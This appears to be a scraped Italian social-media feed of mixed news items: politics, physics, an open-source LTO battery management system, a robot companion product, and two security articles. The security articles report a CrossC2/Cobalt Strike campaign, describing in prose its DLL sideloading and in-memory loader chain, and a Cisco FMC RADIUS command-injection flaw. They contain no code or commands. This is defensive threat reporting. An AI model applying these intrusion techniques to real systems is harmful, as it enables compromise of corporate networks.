giardino-punk.it/anarchismo-e-…
L'anarchismo come politica posmoderna, partendo da un testo di Nathan Jun
Beatrice Sgaravatto reshared this.
Bravissimo Donald. Il gettito dei dazi vale solo il 5% del megadeficit Usa
Esplode il disavanzo federale a causa dell'aumento della spesa per interessi, saliti a causa dell'incertezza scatenata dalle tariffe di Donald Trump. M…Claudio Paudice (HuffPost Italia)
Come nasce la gravità? Forse abbiamo una risposta
L’ipotesi di Erik Verlinde, secondo cui la gravità emergerebbe dall’entropia dell’universo, torna d’attualità grazie a nuovi possibili test sperimentali.Patrizio Coccia (Tom's Hardware)
informapirata ⁂ reshared this.
Il Cardinale Zuppi legge per ore i nomi di 12mila bambini morti nel conflitto in Medio Oriente
@Giornalismo e disordine informativo
articolo21.org/2025/08/il-card…
Pubblichiamo il testo integrale dell’intervento del cardinale Matteo Zuppi, arcivescovo di
like this
GaMe reshared this.
Quali libri vi stanno accompagnando in questi mesi estivi?
Ministero dell'Istruzione
Buon #Ferragosto dal #MIM! ☀ Quali libri vi stanno accompagnando in questi mesi estivi?Telegram
Open Source Lithium-Titanate Battery Management System
Lithium-titanate (LTO) is an interesting battery chemistry that is akin to Li-ion but uses Li2TiO3 nanocrystals instead of carbon for the anode. This makes LTO cells capable of much faster charging and with better stability characteristics, albeit at the cost of lower energy density. Much like LiFePO4 cells, this makes them interesting for a range of applications where the highest possible energy density isn’t the biggest concern, while providing even more stability and long-term safety.
That said, LTO is uncommon enough that finding a battery management system (BMS) can be a bit of a pain. This is where [Vlastimil Slintak]’s open source LTO BMS project may come in handy, which targets single cell (1S) configurations with the typical LTO cell voltage of around 1.7 – 2.8V, with 3 cells in parallel (1S3P). This particular BMS was designed for low-power applications like Meshtastic nodes, as explained on the accompanying blog post which also covers the entire development and final design in detail.
The BMS design features all the stuff that you’d hope is on there, like under-voltage, over-voltage and over-current protection, with an ATtiny824 MCU providing the brains. Up to 1 A of discharge and charge current is supported, for about 2.4 Watt at average cell voltage. With the triple 1,300 mAh LTO cells in the demonstrated pack you’d have over 9 Wh of capacity, with the connected hardware able to query the BMS over I2C for a range of statistics.
Thanks to [Marcel] for the tip.
Cobalt Strike per tutti con CrossC2! Prestiamo attenzione ai server Linux sprovvisti di EDR
Il Giappone è stato colpito da una nuova ondata di attacchi informatici che hanno utilizzato CrossC2, uno strumento per estendere le funzionalità di Cobalt Strike alle piattaforme Linux e macOS. Il centro di coordinamento JPCERT/CC ha riferito che gli attacchi hanno avuto luogo tra settembre e dicembre 2024 e hanno interessato diversi paesi, tra cui il Giappone.
L’analisi degli artefatti caricati su VirusTotal ha mostrato che gli aggressori hanno combinato CrossC2 con altri strumenti come PsExec, Plink e lo stesso Cobalt Strike per penetrare nell’infrastruttura di Active Directory. Cobalt Strike è stato caricato utilizzando un malware appositamente sviluppato chiamato ReadNimeLoader.
CrossC2 è una versione non ufficiale di Beacon e del suo builder che consente l’esecuzione di comandi Cobalt Strike su diversi sistemi operativi dopo aver stabilito una connessione a un server remoto specificato nella configurazione. Nei casi registrati, gli aggressori hanno creato un’attività pianificata sui computer infetti per eseguire un file eseguibile legittimo java.exe, utilizzato per il sideload di ReadNimeLoader nella libreria “jli.dll“.
ReadNimeLoader è scritto in Nim e carica il contenuto di un file di testo in memoria, evitando di scrivere dati su disco. Il codice caricato è OdinLdr, un loader di shellcode aperto che decodifica il Cobalt Strike Beacon incorporato e lo esegue in memoria. Il meccanismo include tecniche anti-debug e anti-analisi che impediscono la decodifica di OdinLdr finché l’ambiente non è completamente controllato.
JPCERT/CC ha rilevato somiglianze tra questa campagna e l’attività BlackSuit/Black Basta segnalata da Rapid7 nel giugno 2025. Sono state riscontrate somiglianze nel dominio C&C utilizzato e nei nomi dei file. Inoltre, sono state rilevate diverse versioni ELF della backdoor SystemBC, che spesso precede l’installazione di Cobalt Strike e la distribuzione di ransomware.
Gli esperti hanno prestato particolare attenzione al fatto che gli aggressori hanno compromesso attivamente i server Linux all’interno delle reti aziendali. Molti di questi sistemi non sono dotati di soluzioni EDR o strumenti di rilevamento simili, il che li rende un comodo punto di ingresso per ulteriori sviluppi dell’attacco. Ciò aumenta il rischio di penetrazione su larga scala e richiede un maggiore controllo su tali segmenti infrastrutturali.
L'articolo Cobalt Strike per tutti con CrossC2! Prestiamo attenzione ai server Linux sprovvisti di EDR proviene da il blog della sicurezza informatica.
Rendite di posizione e spiagge vuote, quei “mea culpa” che mancano da balneari e governi
I gestori balneari, che oggi lamentano le minori presenze sulle spiagge, dovrebbero fare “mea culpa” per essersi sempre battuti contro la ... Scopri di più!Vitalba Azzollini (Domani)
Bug da Oscar (score 10) per Cisco Secure Firewall Management Center
Una falla di sicurezza critica è stata resa pubblica da Cisco nel suo software Secure Firewall Management Center (FMC), permettendo potenzialmente a malintenzionati non autenticati di eseguire, a distanza, comandi shell a loro scelta con alti livelli di autorizzazione. La vulnerabilità, identificata come CVE-2025-20265 e a cui è stato assegnato il punteggio CVSS massimo di 10,0, rappresenta una delle falle di sicurezza più gravi scoperte quest’anno nell’infrastruttura firewall di Cisco.
Gli aggressori possono sfruttare questa vulnerabilità inviando credenziali appositamente create durante il processo di autenticazione RADIUS consentendo loro di iniettare comandi shell dannosi che vengono successivamente eseguiti dal dispositivo di destinazione. Ciò che rende questa vulnerabilità particolarmente pericolosa è il fatto che non richiede alcuna autenticazione e può essere sfruttata da remoto tramite la rete.
La vulnerabilità di sicurezza risiede nell’implementazione del sottosistema RADIUS del software Secure FMC di Cisco e colpisce in particolare la fase di autenticazione, in cui l’input dell’utente viene gestito in modo improprio.
La vulnerabilità colpisce specificamente le versioni 7.0.7 e 7.7.0 del software Cisco Secure FMC, ma solo quando l’autenticazione RADIUS è abilitata per l’interfaccia di gestione basata sul web, per la gestione SSH o per entrambe. Le organizzazioni che non utilizzano l’autenticazione RADIUS non sono vulnerabili a questo specifico vettore di attacco.
La vulnerabilità deriva da una convalida insufficiente degli input durante il processo di verifica delle credenziali, creando un’opportunità per attacchi di iniezione di comandi quando il sistema elabora le richieste di autenticazione inviate al server RADIUS configurato.
Cisco
ha rilasciato aggiornamenti le patch che risolvono la vulnerabilità e consiglia vivamente di applicare immediatamente le patch a tutti i sistemi interessati.
L'articolo Bug da Oscar (score 10) per Cisco Secure Firewall Management Center proviene da il blog della sicurezza informatica.
Sto facendo colazione guardando la messa celebrata dal papa.
Leggono un brano dell'Apocalisse, un testo a cui noi amanti dell'horror e dell'heavy metal dobbiamo moltissimo.
Poliversity - Università ricerca e giornalismo reshared this.
Normale
@Giornalismo e disordine informativo
articolo21.org/2025/08/normale…
Mi sono abituato. Viene giù un altro condominio in Ucraina, a causa di un bombardamento deliberato russo contro i civili: prima era un crimine di guerra, ora è normale. Si ribalta un barcone di migranti con molti annegati, tra cui anche una bimba di pochi mesi: prima era un’immorale omissione di soccorso, ora è normale. […]
L'articolo Normale
Arriva la Fidanzata Robot! la nuova frontiera della tecnologia made in Cina
Mentre l’ascesa dei robot in Cina, il più grande mercato e produttore di robot al mondo, sta attirando l’attenzione dell’industria globale dell’informatica (IT), l’emergere di un “robot fidanzata” sta creando scalpore. Questo piccolo robot, modellato su una giovane donna, può cantare e ballare come un gruppo di ragazze e persino impegnarsi in scambi emotivi. È stato recentemente venduto per circa 2 milioni di won a un’asta (circa 2000 euro).
Secondo media cinesi come Kwai Technology, l’azienda di robotica con sede a Shanghai Lingdong Robotics ha recentemente lanciato il suo primo prodotto robotico, il robot umanoide “NIA-F01” (nome cinese: “Nian”), al prezzo di 9.999 yuan (circa 1500 euro).
“Nian” è un robot da tavolo di 56 cm con l’aspetto di una giovane donna snella. Dotato di vista, udito e tatto, può percepire le parole e le espressioni facciali dell’utente, consentendo la comunicazione emotiva. La superficie del robot è ricoperta da un materiale in silicone che risulta molto simile alla pelle, mentre il suo scheletro è suddiviso in un totale di 34 articolazioni, che gli consentono di muovere il corpo liberamente.
Una caratteristica degna di nota è che gli utenti possono “personalizzare” il carattere del robot che desiderano. Attraverso un telaio auto-sviluppato, gli utenti possono cambiare il viso, l’acconciatura, gli abiti, ecc. a seconda dei propri gusti, e possono anche implementare il tutto inserendo una voce umana, linguaggio, movimenti, personalità, ecc. Gli utenti possono creare un “robot fidanzata personalizzato” in base ai propri gusti.
Lingdong Robot ha presentato “Nian” come “il primo robot desktop personalizzato al mondo con intelligenza artificiale“. Inoltre, alla “World Robot Conference (WRC) 2025”, tenutasi a Pechino dall’8 al 12, ha anche presentato il “primo gruppo di ragazze robot al mondo”, in cui diverse “Nian” hanno imparato canzoni e balli di gruppo e li hanno ballati e cantati direttamente.
Lingdong Robot ha attirato nuovamente l’attenzione quando ha messo “Nian” all’asta su una piattaforma. Lingdong Robot aveva fissato l’offerta minima a 1 won, ma “Nian” è stata venduto all’asta quel giorno per 15.800 yuan (circa 2 milioni di won), superando il prezzo di vendita (9.999 yuan).
I media locali hanno riferito che l’emergere di una “fidanzata robot” è un misto di attesa e scetticismo nel settore IT cinese.
I media e i blog tecnologici cinesi nutrono grandi aspettative per il futuro della robotica, considerando che non solo i robot che sostituiscono le attività umane, ad esempio quelli per l’assistenza clienti e la preparazione culinaria, ma anche quelli in grado di rispondere ai bisogni emotivi degli utenti, come i robot compagni e i robot amici, potrebbero costituire una novità importante nel campo della robotica.
I blog e le testate online cinesi si soffermano sulle potenzialità future dei robot che vanno oltre la semplice sostituzione dell’uomo nelle mansioni lavorative, prendendo in considerazione anche quelli capaci di interazione emotiva, ossia i robot amici e i robot da compagnia, che potrebbero rinnovare profondamente il panorama della robotica.
L'articolo Arriva la Fidanzata Robot! la nuova frontiera della tecnologia made in Cina proviene da il blog della sicurezza informatica.
Pornhub im Visier: Medienwächter wollen noch mehr Netzsperren für Pornoseiten
reshared this
Sabrina Web 📎
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
reshared this
Cybersecurity & cyberwarfare e Andre123 reshared this.